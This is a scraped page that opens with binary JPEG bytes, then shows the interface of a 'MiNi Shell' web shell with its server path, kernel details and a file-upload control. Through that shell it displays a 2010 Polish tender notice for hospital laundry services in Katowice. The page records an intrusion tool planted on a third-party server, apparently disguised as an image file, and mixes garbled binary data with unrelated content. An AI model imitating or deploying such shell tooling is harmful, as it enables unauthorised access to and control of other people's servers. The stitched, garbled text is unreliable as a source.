JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100223/37069-N-2010.html

<p class="kh_header"><b>Katowice: Przedmiotem zamówienia jest świadczenie kompleksowych usług pralniczych  dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej - Szpital im. Prof. Emila Michałowskiego z siedzibą  w Katowicach.</b><br>
<b>Numer ogłoszenia: 37069 - 2010; data zamieszczenia: 23.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej Szpital im. Prof. Emila Michałowskiego , ul. Strzelecka 9, 40-073 Katowice, woj. śląskie, tel. 032 2519027, faks 032 2519027.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.urologia.bip.od.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest świadczenie kompleksowych usług pralniczych  dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej - Szpital im. Prof. Emila Michałowskiego z siedzibą  w Katowicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie kompleksowych usług pralniczych w zakresie: dezynfekcji, prania, maglowania, prasowania i reperacji bielizny i odzieży szpitalnej oraz segregacja, pakowanie i transport bielizny i odzieży szpitalnej brudnej i czystej z i do Szpitala przez okres 36 miesięcy od dnia podpisania umowy zgodnie z normami sanitarno - epidemiologicznymi.
1). Zamawiający wymaga, aby usługa prania była świadczona zgodnie z  obowiązującymi wymogami sanitarnymi i higienicznymi, jakie nakładane są na procesy prania (np. odzież ochronna musi być prana oddzielnie, a pościel skażona poddawana dezynfekcji) oraz technologią i warunkami obowiązującymi  w placówkach służby zdrowia, zgodnie z przepisami rozporządzenia Ministra Zdrowia z 10 listopada 2006 r.   w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. Nr 213 poz. 1568 z póź. zm.).
2). Zamawiający wymaga, aby Wykonawca dostarczał min. 1 raz na kwartał wyniki kontroli mikrobiologicznej bielizny czystej prowadzonej przez PIS, przez cały okres umowy. Wyniki będą dostarczane przez Wykonawcę do siedziby Zamawiającego do Pielęgniarki Epidemiologicznej.
3). Zamawiający wymaga, aby odbiór brudnej oraz dostawa czystej bielizny i odzieży odbywał się w opakowaniach Wykonawcy (np. workach foliowych).
4). Zamawiający wymaga, aby ochronna odzież szpitalna (odzież fasonowa) była wyprasowana w sposób profesjonalny a transport tej odzieży odbywał się na wieszakach jezdnych w specjalnych ochraniaczach Wykonawcy.
5). Zamawiający wymaga, aby nowa odzież fasonowa przed pierwszym praniem została poddana dekatyzacji.
6). Poprzez reperację Zamawiający rozumie bieżące naprawy bielizny i odzieży szpitalnej, tj.: przyszywanie guzików, troków, łat, zamków, cerowanie itp. przy ponoszeniu kosztów potrzebnych, użytych materiałów przez Wykonawcę.  
7).  Segregacja bielizny i odzieży szpitalnej odbywać się będzie na podstawie dokumentacji zdawczo-odbiorczej brudnej i czystej bielizny i odzieży szpitalnej oraz polega na złożeniu w miejscu wskazanym przez Zamawiającego.
8). Bielizna zakażona, tzn. zanieczyszczona wydalinami, wydzielinami, krwią i płynami ustrojowymi oraz od pacjentów z chorobami zakaźnymi będzie przekazywana  do Wykonawcy w osobnym worku, koloru różowego -  na zewnętrznej stronie worka winna być informacja - bielizna zakażona
9). Wykonawca będzie każdorazowo potwierdzał na kwitach ilości kilogramów i sztuk pobranej do wyprania bielizny i odzieży szpitalnej (wg wzoru druku Wykonawcy).
10). Usługa polega na codziennym  ( z wyjątkiem niedziel i dni ustawowo wolnych od pracy) odbieraniu brudnej i przywożeniu czystej bielizny własnym transportem według potrzeb Zamawiającego, tj.:
a) od poniedziałku do soboty - 1 raz dziennie, przy którym następuje:
-  przywóz czystej bielizny  w godzinach od 6:30 do 7:00,
- odbiór brudnej bielizny do prania w godzinach od 8:00 do 8:30,
b). w przypadku, gdy następny dzień jest dniem ustawowo wolnym od pracy, termin odbioru  brudnej bielizny będzie uzgadniany indywidualnie przez strony.
11).Dostawa bielizny i odzieży szpitalnej do Zleceniobiorcy oraz jej odbiór wraz z załadunkiem/wyładunkiem dokonany będzie środkiem transportu Wykonawcy i na jego koszt. 
12). Zamawiający wymaga, by Wykonawca posiadał uprawnienia do świadczenia usług transportowych  w zakresie transportu bielizny i odzieży szpitalnej lub miał podpisaną stosowną umowę na transport z przedsiębiorcą, który spełnia powyższe wymagania. 
Poprzez usługę transportu Zamawiający rozumie dojazd do siedziby Zamawiającego, załadunek, transport, rozładunek i złożenie w miejscu wskazanym przez Zamawiającego
13). Wykonawca na okres trwania umowy, na swój koszt wyposaży punkt zdawczo-odbiorczy bielizny w wagę elektroniczną o powierzchni szali nie mniejszej niż 65x70 cm, z możliwością jednorazowego zważenia od 1-100 kg, z dokładnością min. 100 g. Rodzaj wagi Wykonawca uzgodni z Zamawiającym,  z zastrzeżeniem ze waga musi być legalizowana, konserwowana i naprawiana na koszt Wykonawcy. Po zakończeniu obowiązywania umowy waga zostanie zwrócona Wykonawcy.
14). Szacunkowa ilość bielizny przeznaczonej do prania wynosi w skali miesiąca około 4600 kg.
15). Zamawiający wymaga wykonanie usługi z zastosowaniem właściwych procedur, materiałów i urządzeń odpowiedniej jakości, zgodnie z  obowiązującymi normami i odnośnymi przepisami, wymaganiami producenta  oraz z zachowaniem przepisów BHP i PPoż.
16). Wykonawca powierzy realizację przedmiotu umowy osobom przeszkolonym,  posiadającym kwalifikacje zgodnie z obowiązującymi przepisami.
17). Zastosowane technologie prania muszą uwzględniać odpowiednie środki piorące i dezynfekujące o szerokim spektrum działania przeznaczone do prania bielizny i odzieży szpitalnej
18). Pranie bielizny powinno odbywać się według procesów dostosowanych do stanu zabrudzenia gwarantujących wysoką jakość wypranej bielizny zarówno pod względem bakteriologicznym jak i higienicznym.  
19). Zastosowane środki powinny zwalczać prątki gruźlicy, wzw, grzyby, wywabiać plamy z krwi itp.
20). Zamawiający zapewnia trwałe oznakowanie bielizny i odzieży szpitalnej znakiem umownym Szpitala, celem zapobiegnięcia odbioru bielizny i odzieży szpitalnej nie będącej jego własnością.
21). Wykonawca przejmuje całkowitą odpowiedzialność za stan bielizny szpitalnej od momentu odebrania jej z magazynu bielizny brudnej, do czasu przekazania czystej bielizny do magazynu Zamawiającego.
23). Zamawiający w razie stwierdzenia wad wykonanej usługi (ilość, jakość), których nie można było stwierdzić w momencie odbioru od Wykonawcy, zobowiązany jest zgłosić wszelkie reklamacje jakościowo-ilościowe Wykonawcy w ciągu 2 dni roboczych.
24). Osobą upoważnioną do składania reklamacji (wg. wzoru druku Wykonawcy) jest kierownik sekcji techniczno-gospodarczej lub osoba przez niego upoważniona
25). Wykonawca zobowiązany jest rozpatrzyć reklamację Zamawiającego w ciągu 2 dni roboczych od dnia zgłoszenia
26). W przypadku stwierdzenia zasadności reklamacji dotyczących braków ilościowych oraz w przypadku uszkodzenia bielizny lub odzieży szpitalnej niepodlegającemu reperacji wynikającego z wadliwego procesu prania, Zamawiający zakupi nową bieliznę/odzież szpitalną, a Wykonawca zwróci koszty jej zakupu na podstawie faktury okazanej przez Zamawiającego.
27).W przypadku stwierdzenia zasadności tzw. reklamacji jakościowych naprawialnych, Wykonawca wykonana reklamowaną usługę powtórnie i bezpłatnie (np. wady prasowania, niedopranie).
2.Zaleca się, aby Wykonawca zdobył wszelkie informacje, które mogą być konieczne do prawidłowego przygotowania ofert i prawidłowego wykonania przedmiotu umowy. 
3.Wykonawca gwarantuje niezmienność cen przez okres trwania niniejszej umowy:          
1). Strony ustalają, że cena , o której mowa w ust. 1  będzie waloryzowana po upływie każdego roku kalendarzowego z mocą od 1 stycznia nowego roku, wskaźnikiem wzrostu cen towarów i usług konsumpcyjnych w roku poprzedzającym, ogłaszanym przez Prezesa GUS
2).W obowiązującym terminie stałości cen dopuszczalne będą jedynie zmiany ceny wynikające ze zmian stawek podatku VAT, wprowadzone w odpowiedzi na uzasadniony pisemny wniosek, obowiązujące od dnia wejścia w życie odpowiedniego aktu prawnego
4.Przed wyborem najkorzystniejszej oferty Zamawiający zastrzega sobie prawo do weryfikacji informacji podanych w ofercie poprzez wizytę  (wizję lokalną) w pralni Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.30.00.00-6, 98.31.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawcy są zobowiązani do wniesienia wadium w wysokości 8.000,00 zł        (słownie: osiem tysięcy złotych)
2. Wadium może być wnoszone w formach określonych w art. 45 ust.6 Ustawy Pzp.
3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego, tj.:                                                                                                      PKO BP S.A. I O KATOWICE, Nr: 97 1020 2313 0000 3902 0160 3539 z dopiskiem wadium - kompleksowa usługa pralnicza
4. Za termin wniesienia wadium uważa się dzień i godzinę wpływu środków na konto Zamawiającego lub złożenie oryginału gwarancji czy poręczenia na ręce Zamawiającego ( może być dołączone do oferty, pod warunkiem że nie jest z nią trwale złączone).
Wadium w całości winno znajdować się w posiadaniu Zamawiającego wraz z upłynięciem terminu wyznaczonego do składania ofert.
5. Zarówno gwarancje jak i poręczenia muszą być udzielane do końca terminu związania ofertą wskazanego w niniejszej SIWZ oraz wskazywać wszystkie bez wyjątku wymienione w art. 46 ust. 5 Ustawy Prawo zamówień publicznych okoliczności, w których Wykonawca składający ofertę traci wadium na rzecz Zamawiającego.
6.  Wykonawca, którego oferta nie będzie w całości zabezpieczona akceptowaną formą wadium na warunkach określonych w Ustawie lub niniejszej SIWZ, w tym również na przedłużony okres związania ofertą, lub gdy Wykonawca nie zgodzi się na przedłużenie okresu związania ofertą, zostanie przez Zamawiającego wykluczony z postępowania.
7. Wadia zostaną zwrócone Wykonawcom zgodnie z zasadami określonymi w art. 46 Ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania, tj. posiadają pozytywną opinię/postanowienie wydane przez właściwego Powiatowego Inspektora Sanitarnego w oparciu o przeprowadzone kontrole, potwierdzające spełnianie wymogów Rozporządzenia Ministra Zdrowia z dnia 10 listopada 2006 r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. z 2006 Nr 213 poz. 1568 z późn. zm.) dot. pralni, w której będzie realizowane zamówienie.Data wydania zaświadczenia nie może być odległa od terminu składania ofert więcej niż 6 miesięcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają  niezbędną  wiedzę  i  doświadczenie, tj. wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, trzy usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot niniejszego postępowania,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. posiadają opłaconą polisę ubezpieczenia a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej  z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-formularz ofertowy - Załącznik Nr 1
-tabela cenowa - Załącznik nr 2
-dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych,
-oświadczenie, wskazujące która część zamówienia zostanie powierzona podwykonawcy w przypadku zaistnienia takiej sytuacji - Załącznik nr 5
-zaparafowany projekt umowy - Załącznik nr 6,
-dowód wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wykonawca gwarantuje niezmienność cen przez okres trwania niniejszej umowy, z zastrzeżeniem :               
1). Strony ustalają, że cena , o której mowa w ust. 1  będzie waloryzowana po upływie każdego roku kalendarzowego z mocą od 1 stycznia nowego roku, wskaźnikiem wzrostu cen towarów i usług konsumpcyjnych w roku poprzedzającym, ogłaszanym przez Prezesa GUS, począwszy od roku 2011, na podstawie Aneksu do niniejszej umowy
2).W obowiązującym terminie stałości cen dopuszczalne będą także zmiany ceny wynikające ze zmian stawek podatku VAT, wprowadzone w odpowiedzi na uzasadniony pisemny wniosek, obowiązujące od dnia wejścia w życie odpowiedniego aktu prawnego, na podstawie Aneksu do niniejszej umowy. W takim przypadku zmianie ulegnie kwota podatku VAT i cena brutto, cena netto pozostanie niezmienna.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.urologia.bip.od.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Budynek: Regionalnego Centrum Krwiodawstwa i Krwiolecznictwa
ul. Raciborska 15, Katowice
Dział Marketingu i Organizacji Pracy SP ZOZ-Szpital im. Prof E. Michałowskiego Pokój nr: A 109 - I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2010 godzina 11:00, miejsce: Budynek: Regionalnego Centrum Krwiodawstwa i Krwiolecznictwa
ul. Raciborska 15, Katowice
Dział Marketingu i Organizacji Pracy SP ZOZ-Szpital im. Prof E. Michałowskiego Pokój nr: A 109 - I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com